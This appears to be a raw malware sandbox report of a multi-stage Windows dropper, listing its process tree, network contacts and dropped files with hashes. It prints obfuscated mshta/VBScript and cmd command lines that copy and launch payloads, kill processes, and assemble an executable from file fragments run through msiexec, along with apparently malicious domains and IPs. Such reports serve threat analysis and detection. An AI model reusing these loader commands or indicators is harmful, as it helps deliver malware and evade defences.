C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed22269ff37e.exe

Wed22269ff37e.exe

C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed22add6199f.exe

Wed22add6199f.exe

C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed22d8c4cdc4a5a.exe

Wed22d8c4cdc4a5a.exe

C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed22988be99e.exe

Wed22988be99e.exe

C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed22ac1480b8.exe

Wed22ac1480b8.exe

C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed224fff3f809a1.exe

Wed224fff3f809a1.exe

C:\Users\Admin\AppData\Local\Temp\is-JMRL4.tmp\Wed228eebd341673e072.tmp

"C:\Users\Admin\AppData\Local\Temp\is-JMRL4.tmp\Wed228eebd341673e072.tmp" /SL5="$40246,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed228eebd341673e072.exe"

C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed22ac1480b8.exe

C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed22ac1480b8.exe

C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed22add6199f.exe

C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed22add6199f.exe

C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed2255741b48dffd.exe

C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed2255741b48dffd.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2332 -ip 2332

C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed228eebd341673e072.exe

"C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed228eebd341673e072.exe" /SILENT

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2332 -s 604

C:\Users\Admin\AppData\Local\Temp\is-USGOD.tmp\Wed228eebd341673e072.tmp

"C:\Users\Admin\AppData\Local\Temp\is-USGOD.tmp\Wed228eebd341673e072.tmp" /SL5="$80044,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed228eebd341673e072.exe" /SILENT

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbSCRiPt: ClOse ( creATEObjECt("WscRIpT.sHelL" ). rUn ("cmd.exe /q/c Copy /Y ""C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed22168eb266d7a.exe"" RuA3KQICsIEnUTi.exe && stARt RUA3KqiCSIENutI.eXE -PDOY18jViAcX9ec2G1idjTy2VmsYG & If """" =="""" for %z IN ( ""C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed22168eb266d7a.exe"" ) do taskkill /f /IM ""%~nxz"" " , 0 , TRUe ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /q/c Copy /Y "C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed22168eb266d7a.exe" RuA3KQICsIEnUTi.exe && stARt RUA3KqiCSIENutI.eXE -PDOY18jViAcX9ec2G1idjTy2VmsYG & If "" =="" for %z IN ( "C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed22168eb266d7a.exe" ) do taskkill /f /IM "%~nxz"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3760 -ip 3760

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4492 -ip 4492

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3760 -s 360

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 12

C:\Users\Admin\AppData\Local\Temp\RuA3KQICsIEnUTi.exe

RUA3KqiCSIENutI.eXE -PDOY18jViAcX9ec2G1idjTy2VmsYG

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /IM "Wed22168eb266d7a.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbSCRiPt: ClOse ( creATEObjECt("WscRIpT.sHelL" ). rUn ("cmd.exe /q/c Copy /Y ""C:\Users\Admin\AppData\Local\Temp\RuA3KQICsIEnUTi.exe"" RuA3KQICsIEnUTi.exe && stARt RUA3KqiCSIENutI.eXE -PDOY18jViAcX9ec2G1idjTy2VmsYG & If ""-PDOY18jViAcX9ec2G1idjTy2VmsYG "" =="""" for %z IN ( ""C:\Users\Admin\AppData\Local\Temp\RuA3KQICsIEnUTi.exe"" ) do taskkill /f /IM ""%~nxz"" " , 0 , TRUe ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /q/c Copy /Y "C:\Users\Admin\AppData\Local\Temp\RuA3KQICsIEnUTi.exe" RuA3KQICsIEnUTi.exe && stARt RUA3KqiCSIENutI.eXE -PDOY18jViAcX9ec2G1idjTy2VmsYG & If "-PDOY18jViAcX9ec2G1idjTy2VmsYG " =="" for %z IN ( "C:\Users\Admin\AppData\Local\Temp\RuA3KQICsIEnUTi.exe" ) do taskkill /f /IM "%~nxz"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBScrIPT: Close ( cReATEOBjECt ( "wSCRipt.SHell"). rUn ( "cMD.exe /Q /C ecHO | seT /P = ""MZ"" > GSbPj.qVp & copy /B /Y GSBPj.qVP +NGSPtE2.3uY + O99N0.MK + Umd2y.O + 7BHI9XPY.U +JCHs.E3 M4WXZZ.Y & StARt msiexec.exe /y .\M4WxZZ.Y " , 0 , tRUe ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /C ecHO | seT /P = "MZ" > GSbPj.qVp & copy /B /Y GSBPj.qVP +NGSPtE2.3uY + O99N0.MK +Umd2y.O + 7BHI9XPY.U +JCHs.E3 M4WXZZ.Y & StARt msiexec.exe /y .\M4WxZZ.Y

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" ecHO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>GSbPj.qVp"

C:\Windows\SysWOW64\msiexec.exe

msiexec.exe /y .\M4WxZZ.Y

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv

Network

Country Destination Domain Proto
US 8.8.8.8:53 mooorni.xyz udp
NL 45.133.1.107:80 tcp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 ip-api.com udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 niemannbest.me udp
US 8.8.8.8:53 233.133.159.162.in-addr.arpa udp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 8.8.8.8:53 topniemannpickshop.cc udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 iplogger.org udp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 propanla.com udp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 gcl-gb.biz udp
US 8.8.8.8:53 161.74.67.172.in-addr.arpa udp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 gcl-gb.biz udp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
N/A 127.0.0.1:54571 tcp
N/A 127.0.0.1:54573 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
US 8.8.8.8:53 235.3.20.104.in-addr.arpa udp
US 8.8.8.8:53 208.5.21.104.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FR 51.178.186.149:80 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 104.21.5.208:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 74.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 72.84.118.132:8080 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 45.9.20.13:80 tcp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 futurepreneurs.eu udp
LT 92.61.37.60:443 futurepreneurs.eu tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 r11.o.lencr.org udp
IE 2.18.24.19:80 r11.o.lencr.org tcp
US 8.8.8.8:53 60.37.61.92.in-addr.arpa udp
US 8.8.8.8:53 163.169.246.72.in-addr.arpa udp
US 8.8.8.8:53 19.24.18.2.in-addr.arpa udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp

Files

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 fc3533e313c49ffe6437e82a2c619d7e
SHA1 1778cc5277b8b7691fee1a70f3202fdc12c9f233
SHA256 87b0c1c46b84d57c0255929e6599bf70bcd76d9d9db47d70c65b764c7f4c90b7
SHA512 06f51c5972dae3775fac8aa3e0af0ecc87702c620fb82baafc287189e671a3f35d59f4c2dde6332394324b43db1afe57915ccd06037a5bb511ce8db0b3bcfa98

C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\setup_install.exe

MD5 9bd48b88b9a6aa6b854ee78d989ab074
SHA1 a80dee556656d0b79fe7ac79586a271663e567ee
SHA256 c06eda92e55652011e2285c576f89d223f3f28719e2eeefa2c117059fdce9e22
SHA512 46e4e9430bdf3743b3959a410509036513b8a7b65ee9fafcff174d5469c7de3f318022f11ac6d5d7efcb6067074c912a198c1ad5e38fc87a3482d68d91b6c316

C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/2332-82-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2332-79-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2332-81-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed227d9e0c1976ea6dc.exe

MD5 74e0cb0402a028b086538805ab1b0c2b
SHA1 3d78a24bd8d720a017357e5ff195e961756c8b6c
SHA256 6c801bd308d7c4fee852e854d07869e188fb4bc8cd903515db7d2591c9855a75
SHA512 0b9b7c0c602495a685b824289243068f744377681364ecbf18ca2fecbfd8f9964cefccdf9af7820035245437eeae1dcb80e067862ce22ee0b741f2fee18dfb30

C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed22293324c9c.exe

MD5 bdbbf4f034c9f43e4ab00002eb78b990
SHA1 99c655c40434d634691ea1d189b5883f34890179
SHA256 2da3696e82b2a874191a6f4e3bfd26d4b7e5aa5d187c5afdebbe52263dccd5ae
SHA512 dc3e513ad8cbb887652660603ce76437c6d3670637a99c1145c08fa23de658a5c5ca395cc8a2532de7b73302e88e0e8f1c026c4bb1b23481a3a5bb2dc92a68ec

C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed2235e1e9c9640.exe

MD5 dd67bc52c4a358f3f9fe5f1e37e9a989
SHA1 48d29006637f5f371866c1410bd704e297b79a0b
SHA256 2b16c77f19b87c5d055e4c8a3eb28ecfd0f64c5ced106298e8602a6cdeaa011c
SHA512 2d1eded3db08cfd2fa1599b3976142e63ccfaf94858a7b53efb37b6fec8a17ada0888bdf3f46ce58e1a3cf359d8442c159ad93527e736375bc25c4ea07afdc9b

C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed22269ff37e.exe

MD5 91e3bed725a8399d72b182e5e8132524
SHA1 0f69cbbd268bae2a7aa2376dfce67afc5280f844
SHA256 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d
SHA512 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76

C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed228eebd341673e072.exe

MD5 7c20266d1026a771cc3748fe31262057
SHA1 fc83150d1f81bfb2ff3c3d004ca864d53004fd27
SHA256 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46
SHA512 e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f

C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed224fff3f809a1.exe

MD5 a02438d946903f95bd9f706ad0776c86
SHA1 d4b9470f0d24d94e3d327a456cb98fddd8fe61b4
SHA256 d24b5d75e56e99a246697efda3cf47ff9f1b841aaabb06f987804c02e83f5e0a
SHA512 b4301d4ea11f58bb8d6aae4326838ecbb558b485973e6d52553902a1d2a64217f69956a61470a7956513db904ffd2b1fc8ee55386cc02a4895e758d978ce52b4

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qdfsqj5e.e44.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed2255741b48dffd.exe

MD5 d75800977e3ec3199509eb2e0a6a28f5
SHA1 3edc49c3a466f3bbc977c42406fbd5c90d49e462
SHA256 90fc68c39590b8d6e7783e52e1660ff9ec68daee37940bf49399d95e6ad1fe7b
SHA512 5804a076e306d336f2897be6bb06e7cd80465977a8915ada3e9117128931611a13548b96086625cfc1e7477f067e68208bfceb5a5f38ce7e78716e20e81d4749

memory/2340-134-0x0000000000E70000-0x0000000000EE0000-memory.dmp

memory/2340-142-0x0000000005580000-0x000000000559E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-JMRL4.tmp\Wed228eebd341673e072.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

memory/4064-146-0x0000000000D40000-0x0000000000DB2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-4QL1H.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

memory/1568-140-0x00000000003D0000-0x0000000000440000-memory.dmp

memory/3628-143-0x0000000002ED0000-0x0000000002ED6000-memory.dmp

memory/2340-135-0x0000000005600000-0x0000000005676000-memory.dmp

memory/3628-133-0x0000000000C60000-0x0000000000C78000-memory.dmp

memory/2376-132-0x0000000006100000-0x0000000006454000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed22ac1480b8.exe

MD5 363f9dd72b0edd7f0188224fb3aee0e2
SHA1 2ee4327240df78e318937bc967799fb3b846602e
SHA256 e730ae821668acc373e3126bdba84b6d2b74bfdc183a23bcea5cfc94a4802167
SHA512 72681c776ba5f10e7a9c9e40f419dc79772a1370fd92cfe7f87d48a4baceb1aa381ab3a7b9b6f87780e5ee02fda108158497c13c611d2ece914241920c96aece

C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed22988be99e.exe

MD5 f762e5f3316af686ea906f77787e9a1d
SHA1 09e60c8af577d5753121254663b85bbb7dfc638f
SHA256 557e0a9b0fd9c188589502ef21bea156733ad1bfead7551939e03b4412e2688d
SHA512 e49f1fdb55dbf9aec94ac581746adcd74ae99ee3698a49c377b8d7c2016662c90b89e3d8bb5494e7e5a95d073c35b4829fdc6cb896645de15488bcabb46f4a33

C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed22add6199f.exe

MD5 fbf57ae8dbbb3084f998593061db2c5b
SHA1 0fb6712de7f6bc717af53fadbfa1234eec3f945d
SHA256 a8a5c94fd4826912cccf85b556621bd6e39915d79495e2cef843ef6913ce3041
SHA512 660781340cebdc420ebe9d42dd9a5fedb081dcdc4cf8341d85182e85f8b6b358c886a7e52427ca3345e3dadef1a2173abc8427e01d5faa287674d2417898a930

memory/64-125-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed22d8c4cdc4a5a.exe

MD5 962b4643e91a2bf03ceeabcdc3d32fff
SHA1 994eac3e4f3da82f19c3373fdc9b0d6697a4375d
SHA256 d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b
SHA512 ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd

memory/1884-122-0x0000000000F70000-0x0000000000F78000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed22168eb266d7a.exe

MD5 b7f0edadd7158822a222455fb8d7263d
SHA1 6fcb1b9e6b18afda8f14b57018e6a4f8cbca5442
SHA256 63ed58192e6acc9b2f67b7d5f6c23c2b573a23e9be6cdfc79cceefaeb23c128a
SHA512 1a70e3b84596c0098936a8b2c7cbbd013d380b7357f7dc9d7191c6644ea8a028d638da23f710361dd59c55e8fb1ef0d120abde1dc99f1310f43eff8f4c68657a

C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed220fb9dde4.exe

MD5 b4c503088928eef0e973a269f66a0dd2
SHA1 eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA256 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
SHA512 c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

memory/2940-111-0x0000000006080000-0x00000000060E6000-memory.dmp

memory/2940-110-0x0000000006010000-0x0000000006076000-memory.dmp

memory/2940-109-0x0000000005F70000-0x0000000005F92000-memory.dmp

memory/2376-84-0x0000000005820000-0x0000000005E48000-memory.dmp

memory/2376-83-0x0000000002F50000-0x0000000002F86000-memory.dmp

memory/2332-80-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2332-77-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2332-76-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2332-75-0x000000006494A000-0x000000006494F000-memory.dmp

memory/2332-74-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2332-73-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2332-72-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2332-71-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2332-70-0x0000000000760000-0x00000000007EF000-memory.dmp

memory/2332-69-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/2332-65-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2332-78-0x000000006FE40000-0x000000006FFC6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

memory/4064-156-0x0000000005CD0000-0x0000000006274000-memory.dmp

memory/2376-161-0x0000000006920000-0x000000000696C000-memory.dmp

memory/4056-163-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2376-157-0x00000000064A0000-0x00000000064BE000-memory.dmp

memory/2240-166-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/64-169-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-BTEJR.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/2332-180-0x0000000000400000-0x000000000051C000-memory.dmp

memory/2332-189-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2332-188-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2332-187-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2332-186-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2332-184-0x000000006EB40000-0x000000006EB63000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Wed22ac1480b8.exe.log

MD5 e5352797047ad2c91b83e933b24fbc4f
SHA1 9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772
SHA256 b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c
SHA512 dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827

memory/4220-204-0x0000000005780000-0x000000000588A000-memory.dmp

memory/2376-218-0x0000000007520000-0x00000000075C3000-memory.dmp

memory/2940-219-0x000000006F2B0000-0x000000006F2FC000-memory.dmp

memory/4220-217-0x00000000056B0000-0x00000000056EC000-memory.dmp

memory/2376-229-0x0000000007EB0000-0x000000000852A000-memory.dmp

memory/2376-230-0x0000000007870000-0x000000000788A000-memory.dmp

memory/2376-216-0x0000000006AF0000-0x0000000006B0E000-memory.dmp

memory/2376-206-0x000000006F2B0000-0x000000006F2FC000-memory.dmp

memory/2376-205-0x00000000074E0000-0x0000000007512000-memory.dmp

memory/4492-201-0x0000000000400000-0x0000000000422000-memory.dmp

memory/4220-198-0x0000000005650000-0x0000000005662000-memory.dmp

memory/4220-197-0x0000000005A90000-0x00000000060A8000-memory.dmp

memory/1904-199-0x0000000000400000-0x0000000000422000-memory.dmp

memory/4220-194-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2376-235-0x00000000078F0000-0x00000000078FA000-memory.dmp

memory/2376-237-0x0000000007AE0000-0x0000000007B76000-memory.dmp

memory/2376-239-0x0000000007A70000-0x0000000007A81000-memory.dmp

memory/3760-238-0x0000000000400000-0x0000000002F01000-memory.dmp

memory/2376-240-0x0000000007AA0000-0x0000000007AAE000-memory.dmp

memory/2376-241-0x0000000007AB0000-0x0000000007AC4000-memory.dmp

memory/2940-242-0x0000000007D40000-0x0000000007D5A000-memory.dmp

memory/2940-243-0x0000000007D30000-0x0000000007D38000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 3d086a433708053f9bf9523e1d87a4e8
SHA1 b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA256 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512 931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 46b8d02c9a9ccf0a58ea9ae4fbc73ea1
SHA1 387846ed3cf131cdf0646651603e44ec27248b09
SHA256 2142b8aab03d74182edac8388b94779a4fa30cf68fec8ba76669e21f0ebb8b52
SHA512 db36d57a48f327a09f77aa4d11b681c117d5e8ebd6e3e6b72dfc1c32a732328e507c5b2215c84d739b4d50a7093843d90b685d271df46d44168c4149d47a9297

C:\Users\Admin\AppData\Local\Temp\GSbPj.qVp

MD5 ac6ad5d9b99757c3a878f2d275ace198
SHA1 439baa1b33514fb81632aaf44d16a9378c5664fc
